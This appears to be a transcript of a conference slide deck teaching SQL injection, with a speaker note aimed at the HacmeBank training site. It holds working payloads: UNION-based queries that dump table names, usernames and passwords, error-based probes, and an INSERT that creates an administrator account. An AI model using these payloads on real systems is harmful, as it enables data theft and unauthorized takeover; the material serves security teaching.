  • 23. Suppose I still don’t know the DB engine, Is it Note: string concatenation in is +
  • 24. I’m having an error, it’s not
  • 25. Is it Note: string concatenation in Oracle is ||
  • 27. Is it Note: string concatenation in MySQL is blank space
  • 29. The query in the backend is something like that SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR ….. OR ….LIKE…. A possible location for my input
  • 30. The Strategy Get number of items after the SELECT statement How many items are here SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 31. The Strategy 2. Identify the location of the STRINGS in the SELECT Statement Which of those are strings SELECT …,…,…,…,… FROM …. WHERE ….=…. AND ….!=….. OR …..>……
  • 32. The Strategy 3. Get the Structure of the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,TableNames,….,….,… FROM DatabaseStructure --=…. AND ….!=….. OR …..>……
  • 33. The Strategy 4. Get the data from the database SELECT …,…,…,…,… FROM …. WHERE …. UNION SELECT ….,Usernames,….,….,… FROM Users --=…. AND ….!=….. OR …..>……
  • 34. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 35. 1. Get number of items after the SELECT statement
  • 36. Error
  • 38. Result Why the results are less?
  • 42. Result How many columns do we have in the SELECT statement
  • 43. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 44. 2. Identify the location of the STRINGS in the SELECT Statement 1234') UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
  • 46. Get the Strings and the locations 1234') UNION SELECT NULL,'ABC','DEF','IJK','LMN',NULL,NULL#
  • 48. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 49. 3. Get the Structure of the database 1234') UNION SELECTNULL,NULL,NULL,table_name,NULL,NULL,NULLFROMinformation_schema.tables#
  • 51. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 52. Next Queries 1234') UNION SELECT NULL,NULL,NULL,column_name,NULL,NULL,NULLFROMinformation_schema.columns where table_name=‘USERS'# 1234') UNION SELECT NULL,NULL,NULL,username,password,null,null FROM users WHERE id<100# ……. Continue till you get all the tables
  • 53. The Strategy Get number of items after the SELECT statement Identify the location of the STRINGS in the SELECT Statement 3. Get the Structure of the database 4. Get the data from the database
  • 54. Injection with errors
  • 55. Gives me an Error
  • 56. Getting version ' and 1 in (SELECT @@version)--
  • 57. Gives me this error
  • 59. I get this Error
  • 60. Getting next column name ' group by login.firstname having 1=1--
  • 61. I get this error
  • 62. Again ' group by login.firstname, login.surname having 1=1--
  • 63. Error reveals new column name
  • 64. Again ' group by login.firstname, login.surname,login.username having 1=1--
  • 68. Continue… After getting all of the columns I found a field called IsAdmin-that’s my goal - Putting the following query creates an admin account on the application ‘; INSERT INTO Login (username,pwd,IsAdmin,……) VALUES (‘Administrator’,’******’,TRUE,…..)
  • 69. Not all Injections generate errors
  • 71. You Were GREAT Audience
  • 72. Thank You @mostafasiraj Mostafa Siraj

Notes de l'éditeur

  1. -u &quot;http://rajpc/HacmeBank_v2_Website/aspx/Main.aspx?function=TransactionDetails&amp;account_no=5204320422040001&quot; --cookie &quot;ASP.NET_SessionId=fadqryjsmlb52y45hztq0pvc; CookieLoginAttempts=5; Admin=false&quot; -p account_no